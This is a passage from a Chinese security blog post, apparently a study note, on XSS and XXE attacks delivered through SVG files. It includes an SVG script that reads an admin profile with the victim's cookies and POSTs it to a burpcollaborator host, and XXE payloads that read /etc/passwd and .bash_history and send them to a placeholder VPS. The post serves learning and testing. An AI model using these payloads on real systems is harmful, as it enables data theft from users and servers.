 <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1)<span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>除此之外，你还可以在 SVG 标签中加入 DOM &#x2F; HTML 层面的全局属性，例如 <code>onclick</code>、<code>onload</code>等属性</p>
<p>以下为在 SVG 中可使用、且能直接配合 <code>alert()</code> 的所有 DOM &#x2F; HTML 全局事件属性（Event Handler Attributes）完整列表。</p>
<ul>
<li><strong>鼠标事件（Mouse Events）</strong></li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xml">onclick //鼠标单击触发<br>oncontextmenu //右键菜单（右键点击）<br>ondblclick //鼠标双击<br>onmousedown //鼠标按下<br>onmouseenter //鼠标离开，但不会因为子元素导致重复触发<br>onmouseleave //鼠标进入，但不会因为子元素导致重复触发<br>onmousemove //鼠标在元素上移动<br>onmouseout //鼠标移出元素<br>onmouseover //从外部进入元素范围时触发<br>onmouseup //鼠标松开<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>键盘事件（Keyboard Events）</strong></li>
</ul>
<p>（注：SVG 也能接收键盘事件, 默认不接受，除非你加上 <code>tabindex=&quot;0&quot;</code> 才能获得焦点）</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml">onkeydown //按键按下<br>onkeypress //输入可见字符（新标准已废弃，但仍可用）<br>onkeyup //按键松开<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>焦点事件（Focus Events）</strong></li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs xml">onblur //失去焦点时触发<br>onfocus //取得焦点时触发<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>输入事件（Input &#x2F; Change）</strong></li>
</ul>
<p>主要用于可编辑 SVG 或 SVG 外层嵌套表单时，通常 SVG 不直接使用，但若内部有 <code>&lt;foreignObject&gt;</code> 或可编辑节点则能触发。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs xml">onchange //内容变化完成后触发<br>oninput //输入时触发<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>拖放事件（Drag &amp; Drop）</strong></li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml">ondrag //正在拖动<br>ondrop //放下拖动对象<br>ondragstart //开始拖动<br>ondragend //结束拖动<br>ondragenter //被拖东西进入元素<br>ondragleave //拖动对象离开<br>ondragover //拖动对象停在上面<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>剪贴板事件（Clipboard Events）</strong></li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml">oncopy //复制时触发<br>oncut //剪切时触发<br>onpaste //粘贴时触发<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>触摸事件（Touch Events）（移动端）</strong></li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs xml">ontouchstart //手指触摸开始<br>ontouchend //手指抬起<br>ontouchmove //手指移动<br>ontouchcancel //系统取消触摸<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>指针事件（Pointer Events）</strong></li>
</ul>
<p>（现代浏览器通用，指针可以是鼠标、触摸、触控笔等）</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs xml">onpointerdown //指针按下（按下瞬间触发）<br>onpointerup //指针松开（按下结束）<br>onpointermove //指针移动<br>onpointerenter //指针进入元素（不冒泡）<br>onpointerleave //指针离开元素（不冒泡）<br>onpointerover //指针移入元素（会冒泡）<br>onpointerout //指针移出元素（会冒泡）<br>onpointercancel //指针被取消（系统取消交互）<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>滚动事件（Wheel Events）</strong></li>
</ul>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs 1c">onwheel <span class="hljs-comment">//鼠标滚轮</span><br></code></pre></td></tr></table></figure>

<ul>
<li><strong>加载事件（Load Events）</strong></li>
</ul>
<figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs hsp">onload <span class="hljs-comment">//元素加载完成</span><br><span class="hljs-keyword">onerror</span> <span class="hljs-comment">//加载错误</span><br></code></pre></td></tr></table></figure>

<p><strong>窗口事件（Window event）</strong></p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs 1c">onscroll <span class="hljs-comment">//滚动发生</span><br>onresize <span class="hljs-comment">//尺寸变化（通常用在 &lt;svg&gt; 外层）</span><br></code></pre></td></tr></table></figure>

<p>除了上述属性，还有些属性本身不会执行 JS，但由于它们具备“事件绑定能力”或“可被事件驱动”，因此能导致某些动作在事件发生时触发，例如 <code>begin</code>、<code>end</code>、<code>restart</code>、<code>repeatCount</code>和<code>repeatDur</code>等等</p>
<p>例1：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">&lt;svg <span class="hljs-attribute">xmlns</span>=<span class="hljs-string">&quot;http://www.w3.org/2000/svg&quot;</span> <span class="hljs-attribute">onclick</span>=<span class="hljs-string">&quot;alert(1)&quot;</span>&gt;&lt;/svg&gt;<br></code></pre></td></tr></table></figure>

<p>例2：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">&quot;http://www.w3.org/2000/svg&quot;</span>&gt;</span><br>  <span class="hljs-comment">&lt;!-- 正常的SVG图形内容 --&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">polygon</span> <span class="hljs-attr">fill</span>=<span class="hljs-string">&quot;#00B0D9&quot;</span> <span class="hljs-attr">points</span>=<span class="hljs-string">&quot;41.5,40 38.7,39.2 38.7,47.1 41.5,47.1&quot;</span>/&gt;</span><br>  <span class="hljs-comment">&lt;!-- 隐藏在SVG中的恶意脚本 --&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;text/javascript&quot;</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript">    <span class="hljs-keyword">var</span> xhr = <span class="hljs-keyword">new</span> <span class="hljs-title class_">XMLHttpRequest</span>();</span><br><span class="language-javascript">    xhr.<span class="hljs-property">onreadystatechange</span> = <span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) &#123;</span><br><span class="language-javascript">      <span class="hljs-keyword">if</span> (xhr.<span class="hljs-property">readyState</span> === <span class="hljs-number">4</span>) &#123;</span><br><span class="language-javascript">        <span class="hljs-keyword">var</span> xhr2 = <span class="hljs-keyword">new</span> <span class="hljs-title class_">XMLHttpRequest</span>();</span><br><span class="language-javascript">        xhr2.<span class="hljs-title function_">open</span>(<span class="hljs-string">&quot;POST&quot;</span>, <span class="hljs-string">&quot;http://XXXX.burpcollaborator.net/&quot;</span>);</span><br><span class="language-javascript">        xhr2.<span class="hljs-title function_">send</span>(xhr.<span class="hljs-property">responseText</span>);</span><br><span class="language-javascript">      &#125;</span><br><span class="language-javascript">    &#125;   </span><br><span class="language-javascript">    xhr.<span class="hljs-title function_">open</span>(<span class="hljs-string">&quot;GET&quot;</span>, <span class="hljs-string">&quot;http://www.target.com/profile/admin&quot;</span>);</span><br><span class="language-javascript">    xhr.<span class="hljs-property">withCredentials</span> = <span class="hljs-literal">true</span>;</span><br><span class="language-javascript">    xhr.<span class="hljs-title function_">send</span>();</span><br><span class="language-javascript">  </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span><br></code></pre></td></tr></table></figure>

<ol>
<li>用户A 访问了包含恶意脚本的页面</li>
<li>恶意脚本在 用户A 的浏览器中执行</li>
<li>XMLHttpRequest 使用 用户A 的cookies访问 &#x2F;profile&#x2F;admin</li>
<li>获取 用户A 自己的管理员数据</li>
<li>将 用户A 的数据发送给攻击者</li>
</ol>
<h2 id="SVG造成XXE"><a href="#SVG造成XXE" class="headerlink" title="SVG造成XXE"></a>SVG造成XXE</h2><p>SVG 是基于 XML 的矢量图，因此支持 Entity (实体)功能</p>
<p>XXE 一般也分为有回显和无回显情况</p>
<p>有回显情况下，比较简单，直接读取就行：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">note</span> [</span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///etc/passwd&quot;</span> &gt;</span></span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">height</span>=<span class="hljs-string">&quot;100&quot;</span> <span class="hljs-attr">width</span>=<span class="hljs-string">&quot;1000&quot;</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">text</span> <span class="hljs-attr">x</span>=<span class="hljs-string">&quot;10&quot;</span> <span class="hljs-attr">y</span>=<span class="hljs-string">&quot;20&quot;</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><span class="hljs-tag">&lt;/<span class="hljs-name">text</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>无回显情况下，则相对比较复杂：</p>
<p>PHP 处理代码：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-meta">libxml_disable_entity_loader(false);</span><br><span class="hljs-meta">$xmlfile = file_get_contents(&#x27;php://input&#x27;);</span><br><span class="hljs-meta">$dom = new DOMDocument();</span><br><span class="hljs-meta">$dom-&gt;loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>xml.dtd：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!ENTITY %file <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;php://filter/read=convert.base64-encode/resource=file:///flag&quot;</span>&gt;</span><br><span class="hljs-meta">&lt;!ENTITY %start <span class="hljs-string">&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#x27;http://YOUR-VPS-IP:1234/?%file;&#x27;&gt;&quot;</span>&gt;</span><br><span class="hljs-comment">&lt;!-- &amp;#x25;会被xml解析成% --&gt;</span><br></code></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">Note</span> [</span><br><span class="hljs-meta">    <span class="hljs-meta">&lt;!ENTITY %remote <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;http://YOUR-VPS-IP/xml.dtd&quot;</span>&gt;</span></span><br><span class="hljs-meta">    %remote;</span><br><span class="hljs-meta">    %start;</span><br><span class="hljs-meta">    %send;</span><br><span class="hljs-meta">]&gt;</span><br></code></pre></td></tr></table></figure>

<p>XXE 实现外带数据的整个流程：</p>
<ol>
<li>首先我们payload中的 %remote 去获取 vps 上的 xml.dtd</li>
<li>然后 xml.dtd 中的 %start 去调用 %file</li>
<li>%file 获取服务器上的 C:&#x2F;WINDOWS&#x2F;win.ini 文件并将他 base64 编码</li>
<li>最后通过 %send 将数据发送到vps监听的1234端口上</li>
</ol>
<p>结合 SVG，通过加载外部一个 dtd 文件，然后把读取结果以 HTTP 请求的方式发送到自己的 VPS：</p>
<p>1.svg：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">Note</span> [ </span><br><span class="hljs-meta">	<span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">lab</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///home/r1ck/.bash_history&quot;</span>&gt;</span></span><br><span class="hljs-meta">	<span class="hljs-meta">&lt;!ENTITY %file <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;php://filter/read=convert.base64-encode/resource=file:///home/r1ck/.bash_history&quot;</span>&gt;</span></span><br><span class="hljs-meta">	<span class="hljs-meta">&lt;!ENTITY %remote <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;http://YOUR-VPS-IP:1234/xml.dtd&quot;</span>&gt;</span></span><br><span class="hljs-meta">    %remote;</span><br><span class="hljs-meta">	%start;</span><br><span class="hljs-meta">	%send;</span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">&quot;http://www.w3.org/2000/svg&quot;</span> <span class="hljs-attr">height</span>=<span class="hljs-string">&quot;200&quot;</span> <span class="hljs-attr">width</span>=<span class="hljs-string">&quot;200&quot;</span>&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">text</span> <span class="hljs-attr">y</span>=<span class="hljs-string">&quot;20&quot;</span> <span class="hljs-attr">font-size</span>=<span class="hljs-string">&quot;20&quot;</span>&gt;</span><span class="hljs-symbol">&amp;lab;</span><span class="hljs-tag">&lt;/<span class="hljs-name">text</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>xml.dtd：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!ENTITY % <span class="hljs-keyword">start</span> <span class="hljs-string">&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#x27;http://YOUR-VPS-IP:1234/?%file;&#x27;&gt;&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>或者是</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!ENTITY % <span class="hljs-keyword">start</span> <span class="hljs-string">&quot;&lt;!ENTITY % send SYSTEM &#x27;http://YOUR-VPS-IP:1234/?%file;&#x27;&gt;&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>1.svg 和 xml.dtd 放到 vps 上，然后在 vps 上监听 1234 端口，再在网页提交 1.svg 的链接即可成功读取</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" class="category-chain-item">学习笔记</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/XEE%E6%BC%8F%E6%B4%9E/" class="print-no-link">#XEE漏洞</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>记录一次有关XXE漏洞的学习及有关svg的xss和xxe漏洞</div>
      <div>https://zomnap.github.io/2026/04/07/xxe/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Zomnap</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月7日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/04/08/upload/" title="记一次文件上传漏洞的学习及又一次提权练习">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">记一次文件上传漏洞的学习及又一次提权练习</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/04/05/xss/" title="记一次xss漏洞的学习和好靶场的刷题日志">
                        <span class="hidden-mobile">记一次xss漏洞的学习和好靶场的刷题日志</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start -->
  <div id="corner-cat" aria-hidden="true">
    <div class="cat-svg-wrap">
      <svg class="cat-svg" viewBox="0 0 140 90" xmlns="http://www.w3.org/2000/svg">
        <g class="cat-tail">
          <path d="M112 54 C128 42, 132 30, 122 18 C136 24, 138 42, 126 56"
                fill="none" stroke="currentColor" stroke-width="6" stroke-linecap="round"/>
        </g>

        <g class="cat-body-main">
          <ellipse cx="72" cy="52" rx="34" ry="22" fill="currentColor" opacity="0.16"/>
          <ellipse cx="70" cy="48" rx="30" ry="20" fill="currentColor"/>
          <circle cx="42" cy="42" r="16" fill="currentColor"/>

          <path d="M31 31 L36 18 L43 31 Z" fill="currentColor"/>
          <path d="M41 31 L48 18 L52 32 Z" fill="currentColor"/>

          <path d="M35 42 h4" class="cat-eye left-eye"/>
          <path d="M45 42 h4" class="cat-eye right-eye"/>

          <circle cx="41.5" cy="46.5" r="1.2" fill="#f6c2d8"/>
          <path d="M39 49 Q41.5 51 44 49" class="cat-mouth"/>

          <path d="M28 46 h-10" class="cat-whisker"/>
          <path d="M28 49 h-9" class="cat-whisker"/>
          <path d="M55 46 h10" class="cat-whisker"/>
          <path d="M55 49 h9" class="cat-whisker"/>

          <g class="cat-legs">
            <path d="M56 63 v12" class="cat-leg"/>
            <path d="M68 65 v12" class="cat-leg"/>
            <path d="M82 65 v12" class="cat-leg"/>
            <path d="M94 63 v12" class="cat-leg"/>
          </g>
        </g>
      </svg>
    </div>
  </div>

  <div class="anime-footer-wrap">
    <div class="anime-footer">
      <div class="footer-line">
        <span id="runtime"></span>
      </div>
      <div class="footer-line footer-statistics" data-site-hosts="zomnap.github.io,azumisaki.kdns.fr,azumisaki.github.io">
        <span id="busuanzi_container_site_uv">
          总访客 <strong id="busuanzi_value_site_uv">711</strong> 人
        </span>
        <span id="busuanzi_container_site_pv">
          <span class="divider" aria-hidden="true">·</span>
          总访问 <strong id="busuanzi_value_site_pv">1503</strong> 次
        </span>
      </div>
      <div class="footer-line typing" id="footer-typing"></div>
      <div class="footer-line small">
        © 2026 AzumiSaki · Powered by Hexo & Fluid
      </div>
    </div>
  </div>

  <script src="/js/navbar-hide.js"></script>
  <script src="/js/footer.js?v=mr6apbxm"></script>
  <script src="/js/corner-cat.js"></script>
  <!-- hexo injector body_end end --></body>
</html>
